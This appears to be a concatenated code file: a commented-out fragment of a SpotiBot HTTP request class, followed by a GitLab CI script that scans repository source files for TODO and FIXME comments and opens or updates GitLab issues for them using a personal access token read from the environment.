# def json(self) -> str:
# """Jsonified/string attribute for all SpotiBot objects for mongo
# serialization purposes
#
# Returns:
# Serializable 'json' output of SpotiBot object
# """
# return json.dumps(self.to_dict())
#
#
# # class Request(user.UserDBO):
# class Request:
#
# def __init__(self, headers):
#
# self.headers = headers
#
# # --------------------------/Request Detail/---------------------------
#
# def http_get(self, href):
#
# self.unix_request_tmstmp: spottime.Timestamp = \
# spottime.Timestamp(time.time(), base='seconds')
#
# self.response = \
# Response(requests.get(href, headers=self.headers))
#
# self.endpoint_id: str = \
# hasher.quick_hash(
# f"{href}{self.unix_request_tmstmp}")
#
# return self
#
# def __eq__(self, other) -> bool:
# """Equality comparison to other objects.
#
# Args:
# other: Comparison object
#
# Returns:
# Boolean value indicating whether or not the attributes and their
# associated values are equal between the two objects
# """
# return vars(self) == vars(other)
#
# def __getitem__(self, item: str):
# """Getter method for subscriptability.
#
# Args:
# item: Attribute to get the value of
#
# Returns:
# Attribute value if exists in object's namespace
# """
# return getattr(self, item)
#
# def get(self, item: str, default=None):
# """Method for extracting attributes without throwing existence errors.
#
# Args:
# item: Attribute to get the value of
# default: Return value if attribute doesn't exist
#
# Returns:
# Attribute value or default if attribute does not exist
# """
# return vars(self).get(item, default)
#
# def to_dict(self) -> dict:
# """Calling utility serialization method on all attributes.
#
# Returns:
# String following valid json structure for mongo serialization.
# """
# return {k: get_serializable(v) for k, v in vars(self).items()}
#
# @property
# def json(self) -> str:
# """Jsonified/string attribute for all SpotiBot objects for mongo
# serialization purposes
#
# Returns:
# Serializable 'json' output of SpotiBot object
# """
# return json.dumps(self.to_dict())
|
import sys
import os
import gitlab
# TODO setup a test to make sure everything is working
# TODO add support for multi-line comments
# Map of file extension -> the comment markers that flag a TODO/FIXME line
# for that language. Markers are matched case-insensitively against each
# lowered source line in FileToScrape.read().
accepted_file_types = {'.py': ['#todo', '# todo'],
                       '.c': ['//todo', '// todo'],
                       '.cpp': ['//todo', '// todo'],
                       '.js': ['//todo', '// todo', '// fixme', '//fixme'],
                       '.java': ['//todo', '// todo', '// fixme', '//fixme'],
                       '.php': ['//todo', '// todo', '// fixme', '//fixme'],
                       '.swift': ['//todo', '// todo', '// fixme', '//fixme'],
                       '.cs': ['//todo', '// todo'],
                       '.kt': ['fun todo', '//todo', '// todo'],
                       '.go': ['//todo', '// todo', '// fixme', '//fixme']}
class GitConnect:
    """Wrapper around a python-gitlab connection for the current CI project.

    Reads CI_SERVER_HOST / CI_PROJECT_PATH from the GitLab CI environment
    and authenticates with a personal access token exported as PAT.
    """
    def __init__(self, ):
        self.host = "".join(["https://", os.getenv("CI_SERVER_HOST")])
        self.projectPath = os.getenv("CI_PROJECT_PATH")
        self.token = os.getenv("PAT")
        if not self.token:
            raise ValueError("Please export a private key with API and write access as PAT")
        self.connection = None
        self.project = None
        self.setup()
        # NOTE(review): gl.issues.list() is not scoped to self.project and
        # returns only the first page — confirm whether project.issues.list
        # with pagination was intended.
        self.issues = self.connection.issues.list(state='opened')
    def setup(self):
        """Authenticate against the GitLab instance and resolve the project."""
        self.connection = gitlab.Gitlab(self.host, self.token, api_version="4")
        self.connection.auth()
        self.project = self.connection.projects.get(self.projectPath)
    def create_issue(self, title, description):
        """Create a TODO-labelled issue unless an equivalent one exists."""
        if self.check_issues(title, description):
            issue = self.project.issues.create({'title': title, 'description': description})
            issue.labels = ["TODO"]
            issue.save()
    def check_issues(self, title, description):
        """Return True when a new issue should be created.

        Descriptions have the form "Line number:<n> <todo text>"; after the
        12-char "Line number:" prefix, split(' ', 1) yields [0] = the line
        number and [1] = the todo text. If an open issue matches title and
        todo text but the line number moved, the existing issue is updated
        in place and no new issue is created.
        """
        for issue in self.issues:
            if issue.title == title and issue.description.startswith("Line number:") \
                    and issue.description[12:].split(' ', 1)[1] == description[12:].split(' ', 1)[1]:
                if issue.description[12:].split(' ', 1)[0] == description[12:].split(' ', 1)[0]:
                    return False
                else:
                    # Edit old issue to have new line number
                    editable_issue = self.project.issues.get(issue.iid, lazy=True)
                    editable_issue.description = description
                    editable_issue.save()
                    return False
        return True
class FileToScrape:
    """A single source file to scan for TODO/FIXME comment lines."""

    def __init__(self, name, path):
        self.path = path   # filesystem path opened by read()
        self.name = name   # bare filename, used as the issue title
        self.lines = []    # collected "Line number:<n> <todo text>" entries

    def read(self, file_type):
        """Record every line containing one of *file_type*'s TODO markers.

        Matching is case-insensitive; a line matching several marker
        spellings is recorded once per matching marker. Unreadable files
        are reported and skipped (best-effort).
        """
        try:
            with open(self.path, "r") as handle:
                for index, text in enumerate(handle):
                    lowered = text.lower()
                    for marker in accepted_file_types.get(file_type):
                        if marker in lowered:
                            entry = "".join(
                                ["Line number:", str(index + 1), " ", text.strip()])
                            self.lines.append(entry)
        except Exception as error:
            print(error)
if __name__ == "__main__":
    # NOTE(review): `files` is immediately rebound by the os.walk loop
    # below, so this initialisation is dead code.
    files = dict()
    try:
        gl = GitConnect()
    except ValueError as error:
        print(error)
        sys.exit(1)
    # Walk the repository, scrape TODO lines from every recognised source
    # file, and open one issue per TODO line found.
    for root, _, files in os.walk('.', topdown=False):
        for filename in files:
            file_path = os.path.join(root, filename)
            for accepted_file_type in accepted_file_types.keys():
                # NOTE(review): substring match, so ".py" also matches
                # ".pyc"/".pyi" filenames — confirm whether that is intended.
                if accepted_file_type in filename:
                    file = FileToScrape(filename, file_path)
                    # Files named on the command line are excluded.
                    if file.name not in sys.argv:
                        file.read(accepted_file_type)
                        for line in file.lines:
                            gl.create_issue(file.name, line)
                            print(file.name, line)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.